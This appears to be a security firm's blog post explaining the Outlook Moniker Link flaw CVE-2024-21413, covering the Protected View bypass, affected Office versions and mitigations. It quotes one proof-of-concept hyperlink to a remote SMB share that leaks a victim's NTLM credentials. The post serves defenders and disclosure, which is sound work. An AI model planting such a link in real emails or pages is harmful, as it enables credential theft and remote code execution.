An alarming new vulnerability has shaken the cybersecurity community. An intriguing flaw in Microsoft Outlook’s handling of specific hyperlink formats has been actively exploited in the wild, posing serious risks to individuals and organizations alike. This vulnerability — tracked as CVE-2024-21413 — carries a critical severity score of 9.8, underlining its potential to cause severe impact across enterprise environments.
In this blog, we will explore how this vulnerability works, its implications, the versions affected, and the necessary steps you can take to stay protected.
In February 2024, Microsoft released a patch as part of its Patch Tuesday updates that addressed CVE-2024-21413. The issue revolves around how Microsoft Outlook processes certain types of hyperlinks — which, when improperly handled, allow an attacker to bypass Office Protected View.
Protected View is designed to open files in a restricted mode to prevent potential exploitation. However, if this flaw is successfully exploited, a threat actor could trick Outlook into opening a malicious file in editing mode, effectively neutralizing this security barrier.
According to research by Checkpoint, Outlook normally opens hyperlinks beginning with http:// or https:// through the system’s default browser. However, when alternate protocols — such as the skype:// URL scheme — are invoked, Outlook displays a warning alert before proceeding.
But this defense breaks down with certain protocols, such as file://. In these cases, Outlook does not show a proper security dialog. Instead, the Windows Notification Center only displays an error warning — while still attempting to process the link.
This opens the door to NTLM credential exposure. Simply clicking such a crafted hyperlink could leak local authentication hashes to an attacker-controlled server.
By making a subtle change to the file:// protocol link, researchers demonstrated that it’s possible to bypass the security restriction entirely. For instance, a link such as:
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
can trigger Outlook to access a remote file — in this example, a “test.rtf” document hosted on a remote SMB share. When this happens, the SMB protocol exchanges NTLM authentication details, exposing the victim’s credentials.
Researchers also discovered that the vulnerability extends beyond simple credential theft. Using Windows’ COM (Component Object Model) and the Moniker Link mechanism, they managed to escalate the attack toward arbitrary code execution.
Outlook employs the API ole32!MkParseDisplayName() for parsing such Moniker Links. When it encounters a “!” character, the API interprets the link as a composite moniker, combining multiple moniker types (e.g., FileMoniker and ItemMoniker).
To test the vulnerability, researchers combined:
FileMoniker pointing to \\10.10.111.111\test\test.rtf
ItemMoniker labeled as “something”
When a user clicks the link in Outlook, Windows triggers Microsoft Word as a COM server to open the referenced RTF file. However, since the attacker controls that remote RTF file, they can inject malicious payloads designed to execute through WINWORD.EXE, resulting in remote code execution (RCE) on the victim’s system.
This makes CVE-2024-21413 exceptionally dangerous — as it transforms a simple hyperlink click into a full-blown exploitation chain.
According to Microsoft’s official advisory, the following products are affected but now have patches available:
Microsoft Office 2016 (32-bit and 64-bit)
Microsoft Office LTSC 2021 (32-bit and 64-bit)
Microsoft Office 2019 (32-bit and 64-bit)
(requires cumulative updates to remain patched)
Microsoft 365 Apps for Enterprise (32-bit and 64-bit)
Users running unpatched versions of any of the above remain at high risk.
CVE-2024-21413 represents a severe, actively exploited zero-day in Outlook. Any individual or organization relying on Outlook for email communications could be targeted.
Key Risks Include:
Exposure of NTLM credentials, allowing lateral movement within networks
Execution of remote code, giving attackers control over victim systems
Bypassing of Protected View, undermining Office’s primary security safeguard
Given its exploitability and the fact that attacks were observed before Microsoft’s disclosure, this vulnerability underscores the need for timely patching and proactive defense.
Microsoft acted swiftly by releasing a fix during its February 2024 Patch Tuesday cycle. The patch addresses how Outlook handles file-based hyperlinks and prevents NTLM credential leakage.
However, simply patching is not enough — organizations must ensure that all endpoints, including older or less frequently updated systems, receive the update promptly. Even a single unpatched workstation could expose an entire corporate network.
To mitigate risks from CVE-2024-21413 and similar zero-day vulnerabilities, security professionals and users should:
Install Microsoft’s February 2024 security updates immediately to patch Outlook and Office.
Avoid clicking links in unsolicited or unexpected emails, even if they appear to come from known contacts.
Disable automatic hyperlink handling in Outlook where possible.
Implement email security solutions capable of scanning for malicious URLs and attachments.
Monitor NTLM traffic and authentication logs to detect suspicious external connections.
Educate users about zero-day threats and social engineering tactics.
The Moniker Link vulnerability is a stark reminder that even long-established applications like Microsoft Outlook can harbor hidden weaknesses. Zero-day exploits thrive on the assumption that users — and sometimes administrators — delay patching.
A holistic security posture requires continuous vigilance, layered defense mechanisms, and security-aware culture across the organization.
By understanding how CVE-2024-21413 operates and how it was weaponized, cybersecurity teams can strengthen their incident response plans and refine their vulnerability management strategies.
CVE-2024-21413 is a critical Outlook vulnerability allowing NTLM credential theft and potential remote code execution.
Severity: 9.8 (Critical)
Status: Patched in Microsoft’s February 2024 updates
Action: Update Outlook/Office immediately and practice email link hygiene.
Zero-day vulnerabilities like this remind us that proactive defense is the only real protection against an evolving cyber threat landscape. Staying informed, keeping systems updated, and working closely with cybersecurity professionals are vital to safeguarding your digital assets.
Redfox Security is a diverse network of expert security consultants with a global mindset and a collaborative culture. If you are looking to improve your organization’s security posture, contact us today to discuss your security testing needs. Our team of security professionals can help you identify vulnerabilities and weaknesses in your systems and provide recommendations to remediate them.
“Join us on our journey of growth and development by signing up for our comprehensive courses.“
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
info@redfoxsec.com
©️2025 Redfox Cyber Security Inc. All rights reserved.
